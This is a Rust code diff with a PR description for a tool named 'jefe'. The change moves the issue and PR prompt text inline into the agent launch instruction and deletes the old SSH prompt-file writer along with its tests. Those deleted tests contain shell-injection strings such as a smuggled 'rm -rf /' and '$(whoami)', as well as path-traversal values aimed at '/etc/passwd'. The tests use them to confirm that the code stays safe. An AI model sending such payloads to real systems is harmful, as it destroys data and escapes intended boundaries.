-/// Write the PR agent prompt to disk (local only).
-///
-/// Retained for tests that verify the local PR prompt write step in isolation.
-/// The production dispatch path uses [`issue_prep::write_prompt_to_target`] so
-/// remote PR prompts travel via stdin over `ssh -T`.
-///
-/// @plan PLAN-20260624-PR-MODE.P11
-/// @requirement REQ-PR-011
-#[cfg(test)]
-pub(super) fn write_pr_prompt(
-    work_dir: &std::path::Path,
-    payload: &jefe::github::PrSendPayload,
-) -> Result<(), String> {
-    let prompt_dir = work_dir.join(".jefe");
-    std::fs::create_dir_all(&prompt_dir)
-        .map_err(|error| format!("Failed to create .jefe dir: {error}"))?;
-    let prompt_path = prompt_dir.join("pr-prompt.md");
-    let prompt_content = prs_dispatch::format_pr_prompt(payload);
-    std::fs::write(&prompt_path, &prompt_content)
-        .map_err(|error| format!("Failed to write PR prompt: {error}"))
 }
 
 /// Resolved context needed to send a PR to an agent (mirrors `IssueSendInfo`).

--- a/src/app_input/remote_probe.rs
+++ b/src/app_input/remote_probe.rs
@@ -1,6 +1,6 @@
 //! Side-effect-free remote agent-runtime availability probe.
 //!
-//! Before any issue git prep/cleanup/prompt side effect or PR prompt write,
+//! Before any issue git prep/cleanup side effect,
 //! the selected runtime is probed on the remote target to confirm the exact
 //! binary (`code-puppy` or `llxprt`) is available for the **effective**
 //! run-as user. The probe is:
@@ -224,20 +224,6 @@ fn wrap_probe_for_effective_user(remote: &RemoteRepositorySettings, inner: Strin
         )
     }
 }
-
-fn ssh_arguments_as_strings(
-    remote: &RemoteRepositorySettings,
-    remote_command: &str,
-) -> Result<Vec<String>, String> {
-    jefe::ssh::SshPlan::arguments(remote, remote_command, jefe::ssh::SshMode::NonInteractive)
-        .map(|args| {
-            args.into_iter()
-                .map(|arg| arg.to_string_lossy().into_owned())
-                .collect()
-        })
-        .map_err(|error| error.to_string())
-}
-
 /// Build the inner shell command for the sentinel-based availability probe.
 ///
 /// The script always returns shell success (so `set -e` isn't needed) and
@@ -364,7 +350,7 @@ fn execute_remote_probe_command(
 /// Centralized pre-side-effect availability validation for issue/PR sends.
 ///
 /// This is the single entry point called before any destructive/file side
-/// effect (issue git prep, dirty-confirm, PR prompt write). It:
+/// effect (issue git prep, dirty-confirm). It:
 ///
 /// - **Local targets**: delegates to the `installed_agent_kinds` session
 ///   snapshot (no PATH I/O during input handling).
@@ -478,7 +464,7 @@ pub(super) fn require_runtime_available(
 /// Pre-side-effect availability guard for issue/PR send paths.
 ///
 /// This is the centralized entry point called BEFORE any destructive/file
-/// side effect (issue git prep, dirty-confirm discard, PR prompt write). It:
+/// side effect (issue git prep, dirty-confirm discard). It:
 ///
 /// 1. Reads the `installed_agent_kinds` snapshot from `app_state` under a
 ///    short read-lock.
@@ -515,155 +501,24 @@ pub(super) fn pre_side_effect_runtime_available_or_error(
     }
 }
 
-// ──────────────────────────────────────────────────────────────────────────
-// Production remote PR prompt planning seam (defect 4)
-// ──────────────────────────────────────────────────────────────────────────
-
-/// Relative path of the PR prompt inside the work dir.
-///
-/// Must be exactly `.jefe/pr-prompt.md` — NOT the issue path. Production
-/// callers (`prs_orchestration`) hold their own module-local constant; this
-/// test constant keeps the remote-probe planning-seam tests self-contained.
-#[cfg(test)]
-pub(super) const PR_PROMPT_RELATIVE_PATH: &str = ".jefe/pr-prompt.md";
-
-/// A planned remote prompt-write operation (pure data for test verification).
-#[derive(Debug, Clone, PartialEq, Eq)]
-pub(super) struct PlannedPromptWrite {
-    /// The full `ssh -T` argv (everything after the `ssh` binary).
-    pub ssh_argv: Vec<String>,
-    /// The controlled Unix command sent to the remote host.
-    remote_command: String,
-    /// The relative prompt path targeted (e.g. `.jefe/pr-prompt.md`).
-    pub relative_path: String,
-    /// Prompt bytes that would be transferred via stdin.
-    pub stdin_prompt: String,
-}
-
-/// Plan a remote prompt-write operation for a production PR prompt.
-///
-/// This is the **exact production remote prompt planning seam** (defect 4).
-/// It is parameterized by `relative_path` so it can be used for both PR
-/// (`.jefe/pr-prompt.md`) and issue prompts. The plan:
-///
-/// - Targets `{work_dir}/{relative_path}` (e.g. `.jefe/pr-prompt.md`).
-/// - Transfers prompt bytes via **stdin** (`cat > path`), never shell
-///   interpolation.
-/// - Uses `ssh -T` (no PTY), targeting `<login_user>@<host>`.
-/// - Wraps in `sudo -n su - <effective_user> -c` when effective user differs.
-/// - Does NOT include adversarial content in argv.
-///
-/// Returns `Err` when the relative path is invalid (not under `.jefe/`,
-/// absolute, or contains `..` traversal).
-pub(super) fn plan_remote_prompt_write(
-    remote: &RemoteRepositorySettings,
-    work_dir: &Path,
-    relative_path: &str,
-    prompt: &str,
-) -> Result<PlannedPromptWrite, String> {
-    validate_prompt_relative_path(relative_path)?;
-    let escaped_jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
-    let escaped_prompt_path = shell_escape(&work_dir.join(relative_path).to_string_lossy());
-    let inner = format!("set -e; mkdir -p {escaped_jefe_dir}; cat > {escaped_prompt_path}");
-    let effective = effective_user(remote);
-    let command = if effective == remote.login_user.trim() {
-        inner
-    } else {
-        format!(
-            "sudo -n su - {} -c {}",
-            shell_escape(&effective),
-            shell_escape(&inner),
-        )
-    };
-    let ssh_argv = ssh_arguments_as_strings(remote, &command)?;
-    // Adversarial content safety: prompt bytes are in stdin, NOT argv.
-    // Compare whole tokens to avoid false positives when a short prompt is a
-    // coincidental substring of a fixed ssh option (e.g. "yes" ⊂ "BatchMode=yes").
-    if !prompt.is_empty() && ssh_argv.iter().any(|arg| arg == prompt) {
-        return Err("prompt content leaked into ssh argv — must be stdin only".to_owned());
-    }
-    Ok(PlannedPromptWrite {
-        ssh_argv,
-        remote_command: command,
-        relative_path: relative_path.to_owned(),
-        stdin_prompt: prompt.to_owned(),
-    })
-}
-
-/// Validate that a prompt relative path is safe: it must start with `.jefe/`,
-/// be relative (no leading `/`), and contain no path-traversal components
-/// (`..`).
-fn validate_prompt_relative_path(relative_path: &str) -> Result<(), String> {
-    if !relative_path.starts_with(".jefe/") {
-        return Err(format!(
-            "Prompt path {relative_path:?} must start with '.jefe/'"
-        ));
-    }
-    if relative_path.starts_with('/') {
-        return Err(format!(
-            "Prompt path {relative_path:?} must be relative, not absolute"
-        ));
-    }
-    if Path::new(relative_path)
-        .components()
-        .any(|c| matches!(c, std::path::Component::ParentDir))
-    {
-        return Err(format!(
-            "Prompt path {relative_path:?} must not contain '..' traversal"
-        ));
-    }
-    Ok(())
-}
-
 /// Shell-escape a single-quoted string (mirrors `runtime::commands`).
 fn shell_escape(value: &str) -> String {
     format!("'{}'", value.replace('\'', r"'\''"))
 }
 
-/// Execute a production remote prompt write, reusing the planning seam.
-///
-/// This delegates to [`plan_remote_prompt_write`] to build the exact `ssh -T`
-/// argv (with prompt bytes in stdin), then executes it. The plan guarantees:
-/// - `.jefe/pr-prompt.md` (or the given relative path) is targeted.
-/// - Prompt bytes are transferred via stdin (`cat > path`), never shell
-///   interpolation.
-/// - Adversarial content is absent from argv (validated by the planner).
-///
-/// # Errors
-///
-/// Returns `Err` when:
-/// - The relative path is invalid (not `.jefe/`, absolute, traversal).
-/// - The `ssh` process fails to spawn.
-/// - The remote command exits nonzero.
-pub(super) fn write_remote_prompt(
+/// Build SSH argv as strings (test-only helper for probe planning).
+#[cfg(test)]
+fn ssh_arguments_as_strings(
     remote: &RemoteRepositorySettings,
-    work_dir: &Path,
-    relative_path: &str,
-    prompt: &str,
-) -> Result<(), String> {
-    let planned_write = plan_remote_prompt_write(remote, work_dir, relative_path, prompt)?;
-    let plan = jefe::ssh::SshPlan::new(
-        remote,
-        &planned_write.remote_command,
-        jefe::ssh::SshMode::NonInteractive,
-    )
-    .map_err(|error| error.to_string())?;
-    let output = plan
-        .execute(
-            Some(planned_write.stdin_prompt.as_bytes()),
-            jefe::ssh::SSH_OPERATION_TIMEOUT,
-            None,
-        )
-        .map_err(|error| error.to_string())?;
-    if output.status.success() {
-        Ok(())
-    } else {
-        Err(jefe::ssh::classify_failure(
-            output.status.code(),
-            &String::from_utf8_lossy(&output.stderr),
-        )
-        .to_string())
-    }
+    remote_command: &str,
+) -> Result<Vec<String>, String> {
+    jefe::ssh::SshPlan::arguments(remote, remote_command, jefe::ssh::SshMode::NonInteractive)
+        .map(|args| {
+            args.into_iter()
+                .map(|arg| arg.to_string_lossy().into_owned())
+                .collect()
+        })
+        .map_err(|error| error.to_string())
 }
 
 /// Re-export [`WorkTarget`] from `issue_prep` so this module's signatures

--- a/src/app_input/remote_probe_tests.rs
+++ b/src/app_input/remote_probe_tests.rs
@@ -1,5 +1,4 @@
-//! Tests for the remote agent-runtime availability probe and classifier
-//! (defects 2, 3, 4).
+//! Tests for the remote agent-runtime availability probe and classifier.
 //!
 //! These tests exercise:
 //! - The pure [`classify_probe_output`] classifier: true/false/transport/auth/
@@ -15,20 +14,10 @@ use std::path::Path;
 use jefe::domain::{AgentKind, RemoteRepositorySettings};
 
 trait TestResultExt<T> {
-    #[allow(dead_code)]
-    fn value_or_panic(self, context: &str) -> T;
     fn error_or_panic(self, context: &str) -> String;
 }
 
 impl<T, E: std::fmt::Debug> TestResultExt<T> for Result<T, E> {
-    #[allow(dead_code)]
-    fn value_or_panic(self, context: &str) -> T {
-        match self {
-            Ok(value) => value,
-            Err(error) => panic!("{context}: {error:?}"),
-        }
-    }
-
     fn error_or_panic(self, context: &str) -> String {
         match self {
             Ok(_) => panic!("{context}: expected error"),
@@ -36,7 +25,6 @@ impl<T, E: std::fmt::Debug> TestResultExt<T> for Result<T, E> {
         }
     }
 }
-
 fn valid_remote() -> RemoteRepositorySettings {
     RemoteRepositorySettings {
         enabled: true,

--- a/src/app_input/remote_probe_tests.rs
+++ b/src/app_input/remote_probe_tests.rs
@@ -7,10 +7,7 @@
 //! - The pure [`plan_remote_probe`] planner: ssh -T, exact binary, effective
 //!   user, no install/setup, sentinel protocol.
 //! - The centralized [`require_runtime_available`] validation: unavailable
-//!   remote means no prep/prompt operation.
-//! - The production PR prompt planning seam [`plan_remote_prompt_write`]:
-//!   `.jefe/pr-prompt.md` targeted, prompt bytes in stdin, adversarial
-//!   content absent from argv.
+//!   remote means no prep operation.
 
 use super::*;
 use std::path::Path;
@@ -18,11 +15,13 @@ use std::path::Path;
 use jefe::domain::{AgentKind, RemoteRepositorySettings};
 
 trait TestResultExt<T> {
+    #[allow(dead_code)]
     fn value_or_panic(self, context: &str) -> T;
     fn error_or_panic(self, context: &str) -> String;
 }
 
 impl<T, E: std::fmt::Debug> TestResultExt<T> for Result<T, E> {
+    #[allow(dead_code)]
     fn value_or_panic(self, context: &str) -> T {
         match self {
             Ok(value) => value,
@@ -658,229 +657,4 @@ fn require_runtime_local_wires_to_local_check() {
         )
         .is_ok()
     );
-}
-
-// ── plan_remote_prompt_write: PR prompt planning seam (defect 4) ─────
-
-#[test]
-fn pr_prompt_plan_targets_jefe_pr_prompt_path() {
-    let plan = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        PR_PROMPT_RELATIVE_PATH,
-        "PR prompt content",
-    )
-    .value_or_panic("valid plan");
-    assert!(
-        plan.ssh_argv
-            .iter()
-            .any(|a| a.contains(".jefe/pr-prompt.md")),
-        "must target .jefe/pr-prompt.md: {:?}",
-        plan.ssh_argv
-    );
-    // Must NOT target the issue path.
-    assert!(
-        plan.ssh_argv
-            .iter()
-            .all(|a| !a.contains(".jefe/issue-prompt.md")),
-        "must NOT target issue path: {:?}",
-        plan.ssh_argv
-    );
-}
-
-#[test]
-fn pr_prompt_plan_not_targets_issue_path() {
-    let plan = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        PR_PROMPT_RELATIVE_PATH,
-        "content",
-    )
-    .value_or_panic("valid plan");
-    for arg in &plan.ssh_argv {
-        assert!(
-            !arg.contains("issue-prompt"),
-            "PR plan must not reference issue prompt: {arg}"
-        );
-    }
-}
-
-#[test]
-fn pr_prompt_plan_prompt_bytes_in_stdin_not_argv() {
-    let adversarial = "'; rm -rf /; echo '`\n$(whoami)";
-    let plan = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        PR_PROMPT_RELATIVE_PATH,
-        adversarial,
-    )
-    .value_or_panic("valid plan");
-    // Prompt bytes are in stdin_prompt.
-    assert_eq!(plan.stdin_prompt, adversarial);
-    // No adversarial content in argv.
-    for arg in &plan.ssh_argv {
-        assert!(
-            !arg.contains("rm -rf"),
-            "adversarial content must not appear in argv: {arg}"
-        );
-        assert!(
-            !arg.contains("whoami"),
-            "adversarial content must not appear in argv: {arg}"
-        );
-    }
-}
-
-#[test]
-fn pr_prompt_plan_uses_cat_redirect_for_stdin_transfer() {
-    let plan = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        PR_PROMPT_RELATIVE_PATH,
-        "content",
-    )
-    .value_or_panic("valid plan");
-    assert!(
-        plan.ssh_argv.iter().any(|a| a.contains("cat >")),
-        "must use cat > for stdin transfer: {:?}",
-        plan.ssh_argv
-    );
-}
-
-#[test]
-fn pr_prompt_plan_creates_jefe_dir() {
-    let plan = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        PR_PROMPT_RELATIVE_PATH,
-        "content",
-    )
-    .value_or_panic("valid plan");
-    assert!(
-        plan.ssh_argv.iter().any(|a| a.contains("mkdir -p")),
-        "must create .jefe dir: {:?}",
-        plan.ssh_argv
-    );
-}
-
-#[test]
-fn pr_prompt_plan_uses_ssh_t() {
-    let plan = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        PR_PROMPT_RELATIVE_PATH,
-        "content",
-    )
-    .value_or_panic("valid plan");
-    assert!(plan.ssh_argv.iter().any(|a| a == "-T"));
-    assert!(!plan.ssh_argv.iter().any(|a| a == "-tt"));
-}
-
-#[test]
-fn pr_prompt_plan_targets_login_user_at_host() {
-    let plan = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        PR_PROMPT_RELATIVE_PATH,
-        "content",
-    )
-    .value_or_panic("valid plan");
-    assert!(
-        plan.ssh_argv
-            .iter()
-            .any(|a| a == "ubuntu@build.example.com"),
-        "must target ubuntu@build.example.com: {:?}",
-        plan.ssh_argv
-    );
-}
-
-#[test]
-fn pr_prompt_plan_wraps_effective_user() {
-    let plan = plan_remote_prompt_write(
-        &remote_with_run_as(),
-        Path::new("/home/acoliver/work"),
-        PR_PROMPT_RELATIVE_PATH,
-        "content",
-    )
-    .value_or_panic("valid plan");
-    assert!(
-        plan.ssh_argv.iter().any(|a| a.contains("sudo")),
-        "must wrap effective user: {:?}",
-        plan.ssh_argv
-    );
-    assert!(
-        plan.ssh_argv.iter().any(|a| a.contains("acoliver")),
-        "must run as acoliver: {:?}",
-        plan.ssh_argv
-    );
-}
-
-#[test]
-fn pr_prompt_plan_rejects_absolute_path() {
-    let result = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        "/etc/passwd",
-        "content",
-    );
-    assert!(result.is_err());
-}
-
-#[test]
-fn pr_prompt_plan_rejects_traversal_path() {
-    let result = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        ".jefe/../../../etc/passwd",
-        "content",
-    );
-    assert!(result.is_err());
-}
-
-#[test]
-fn pr_prompt_plan_rejects_non_jefe_path() {
-    let result = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        "etc/evil.md",
-        "content",
-    );
-    assert!(result.is_err());
-}
-
-#[test]
-fn pr_prompt_relative_path_constant_has_correct_value() {
-    // The PR seam must target .jefe/pr-prompt.md, NOT the issue path.
-    // Verify the constant value that all PR prompt writes use.
-    assert_eq!(PR_PROMPT_RELATIVE_PATH, ".jefe/pr-prompt.md");
-}
-
-#[test]
-fn pr_prompt_plan_relative_path_recorded() {
-    let plan = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        PR_PROMPT_RELATIVE_PATH,
-        "content",
-    )
-    .value_or_panic("valid plan");
-    assert_eq!(plan.relative_path, ".jefe/pr-prompt.md");
-}
-
-#[test]
-fn pr_prompt_plan_adversarial_newlines_in_stdin_only() {
-    let adversarial = "line1\nline2\n'; injected '; `backtick`";
-    let plan = plan_remote_prompt_write(
-        &valid_remote(),
-        Path::new("/home/ubuntu/work"),
-        PR_PROMPT_RELATIVE_PATH,
-        adversarial,
-    )
-    .value_or_panic("valid plan");
-    assert_eq!(plan.stdin_prompt, adversarial);
-    for arg in &plan.ssh_argv {
-        assert!(
-            !arg.contains("injected"),
-            "adversarial must not leak into argv: {arg}"
-        );
-    }
 }

--- a/src/app_input/transient_issue_send.rs
+++ b/src/app_input/transient_issue_send.rs
@@ -163,7 +163,8 @@ fn handle_transient_prep_outcome(
 ) {
     match outcome {
         Ok(PrepOutcome::Ready) => {
-            let launch_sig = prepare_issue_launch_signature(prep.launch_sig.clone());
+            let prompt = issues_dispatch::format_issue_prompt(&prep.payload);
+            let launch_sig = prepare_issue_launch_signature(prep.launch_sig.clone(), &prompt);
             launch_transient_issue_agent(
                 app_state,
                 ctx,
@@ -208,13 +209,11 @@ fn prepare_and_launch_transient_issue(
         return;
     };
 
-    let prompt = issues_dispatch::format_issue_prompt(&prep.payload);
     let outcome = prepare_issue_target(
         &target,
         &prep.work_dir,
         prep.clone_identity.as_ref(),
         DirtyPolicy::Stop,
-        &prompt,
     );
     handle_transient_prep_outcome(app_state, ctx, &prep, outcome);
 }

--- a/src/app_input/transient_pr_send.rs
+++ b/src/app_input/transient_pr_send.rs
@@ -22,8 +22,6 @@ use super::prs_orchestration::{
     apply_pr_send_to_agent_failed, focused_pr_comment, launch_pr_agent, pr_base_prompt,
 };
 
-const PR_PROMPT_RELATIVE_PATH: &str = ".jefe/pr-prompt.md";
-
 /// Whether the PRs agent-chooser has the transient slot selected.
 pub(super) fn is_transient_slot_selected_prs(app_state: &AppStateHandle) -> bool {
     let state = app_state.read();
@@ -191,30 +189,32 @@ fn handle_transient_pr_outcome(
     }
 }
 
-/// Availability check, target resolution, clone + prompt write, and launch
-/// for a transient PR send. Reuses the shared clone/checkout prep so the PR
-/// gets a real repository checkout (not just an empty dir).
+/// Availability check, target resolution, clone, and launch for a transient
+/// PR send. Reuses the shared clone/checkout prep so the PR gets a real
+/// repository checkout (not just an empty dir).
+///
+/// Issue #315: the PR prompt content is inlined into the launch instruction
+/// via `-i`, so no `.jefe/pr-prompt.md` file is written.
 fn prepare_and_launch_transient_pr(
     app_state: &mut AppStateHandle,
     ctx: &SharedContext,
     prep: TransientPrPrepContext,
 ) {
+    let prompt_content = prs_dispatch::format_pr_prompt(&prep.payload);
     let launch_sig = prepare_fresh_prompt_signature(
         prep.launch_sig,
         FreshPromptKind::PullRequest,
-        PR_PROMPT_RELATIVE_PATH,
+        &prompt_content,
     );
     let prep = TransientPrPrepContext { launch_sig, ..prep };
     let Some(target) = transient_pr_availability_and_target(app_state, ctx, &prep) else {
         return;
     };
-    let prompt_content = prs_dispatch::format_pr_prompt(&prep.payload);
     let outcome = super::issue_prep::prepare_issue_target(
         &target,
         &prep.work_dir,
         prep.clone_identity.as_ref(),
         DirtyPolicy::Stop,
-        &prompt_content,
     );
     handle_transient_pr_outcome(app_state, ctx, &prep, outcome);
 }

--- a/src/app_input/transient_queue_ops.rs
+++ b/src/app_input/transient_queue_ops.rs
@@ -9,7 +9,7 @@ use jefe::domain::{Agent, AgentId, RepositoryId};
 use jefe::state::{AppEvent, QueuedTransientSend};
 
 use super::{
-    AppStateHandle, SharedContext, apply_and_persist, clone_identity, issues_send,
+    AppStateHandle, SharedContext, apply_and_persist, clone_identity, issues_dispatch, issues_send,
     transient_issue_send, transient_pr_send,
 };
 
@@ -103,7 +103,8 @@ fn dispatch_dequeued_payload(
     let launch_sig = item.launch_signature.clone();
     match item.payload {
         jefe::state::TransientPayload::Issue { payload } => {
-            let launch_sig = issues_send::prepare_issue_launch_signature(launch_sig);
+            let prompt = issues_dispatch::format_issue_prompt(&payload);
+            let launch_sig = issues_send::prepare_issue_launch_signature(launch_sig, &prompt);
             transient_issue_send::dispatch_transient_dequeued_issue(
                 app_state,
                 ctx,

--- a/src/runtime/commands_tests.rs
+++ b/src/runtime/commands_tests.rs
@@ -760,7 +760,7 @@ fn code_puppy_fresh_send_outputs_instruction_positional() {
     let mut signature = base_signature();
     signature.agent_kind = AgentKind::CodePuppy;
     signature.mode_flags =
-        vec!["Read and work on the GitHub issue described in .jefe/issue-prompt.md".to_owned()];
+        vec!["Read and work on the following GitHub issue.\n\nIssue body".to_owned()];
     signature.pass_continue = false;
 
     assert_eq!(
@@ -769,7 +769,7 @@ fn code_puppy_fresh_send_outputs_instruction_positional() {
             "-i",
             "--yolo",
             "false",
-            "Read and work on the GitHub issue described in .jefe/issue-prompt.md"
+            "Read and work on the following GitHub issue.\n\nIssue body"
         ]
     );
 }
@@ -785,7 +785,7 @@ fn code_puppy_strips_all_llxprt_only_flags() {
         "ignored-profile".to_owned(),
         "--sandbox".to_owned(),
         "--continue".to_owned(),
-        "Read and work on the GitHub PR described in .jefe/pr-prompt.md".to_owned(),
+        "Read and work on the following GitHub PR.\n\nPR body".to_owned(),
     ];
 
     assert_eq!(launch_args(&signature), vec!["-i", "--yolo", "false"]);


### PR DESCRIPTION
## Summary

Previously jefe wrote the issue/PR prompt markdown to `.jefe/issue-prompt.md` (or `.jefe/pr-prompt.md`) on disk and referenced that file path in the agent instruction string. This got in the way of git operations because `.jefe/` is gitignored, creating phantom working-copy changes that confused dirty-status checks and git operations.

This PR inlines the full prompt content directly into the `-i` instruction string passed to the agent launch, eliminating the on-disk file write entirely.

## Changes

### Core architectural change

- **`prepare_fresh_prompt_signature`** now accepts `prompt_content: &str` instead of a relative file path. The instruction becomes `Read and work on the following GitHub {kind}.\n\n{content}` (plus the `ISSUE_DELIVERY_WORKFLOW` appendix for issues).
- **`prepare_issue_launch_signature`** now accepts `(sig, prompt_content)` and passes the content through to the signature builder.
- **`prepare_issue_target`**, `prepare_issue_target_force_reclone`, and all local/remote prep functions no longer accept or write a prompt parameter.
- **`RemotePrepRunner`** no longer creates `.jefe/` or writes prompt bytes via SSH stdin.

### Dead code removed (~950 lines net reduction)

- `validate_prompt_relative_path`, `write_prompt_to_target`, `write_prompt_local_generic`, `write_prompt_remote_generic` (issue_prep.rs)
- `write_remote_prompt`, `plan_remote_prompt_write`, `PlannedPromptWrite`, `PR_PROMPT_RELATIVE_PATH` constant (remote_probe.rs)
- `write_prompt`, `run_wrapped_stdin`, `run_remote_stdin` (issue_prep_remote.rs)
- `write_pr_prompt_to_target`, `write_pr_prompt` (prs_orchestration.rs)
- `ISSUE_PROMPT_RELATIVE_PATH` constant (issue_prep.rs)
- `PR_PROMPT_RELATIVE_PATH` constant (transient_pr_send.rs, prs_orchestration.rs)

### Updated tests

All tests updated to verify the prompt content is inlined into the launch instruction rather than written to disk. New test `plan_does_not_write_prompt_to_disk` verifies the remote prep planner emits no prompt-writing SSH operations.

## Verification

- `cargo fmt --all --check` — clean
- `cargo clippy --workspace --all-targets --all-features -- -D warnings` — clean
- `cargo test --workspace --all-features` — 3339 tests pass, 0 failures

## Scope

17 files changed, 319 insertions(+), 1156 deletions(-). Well within the 25-file / 1500-line budget.

Fixes #315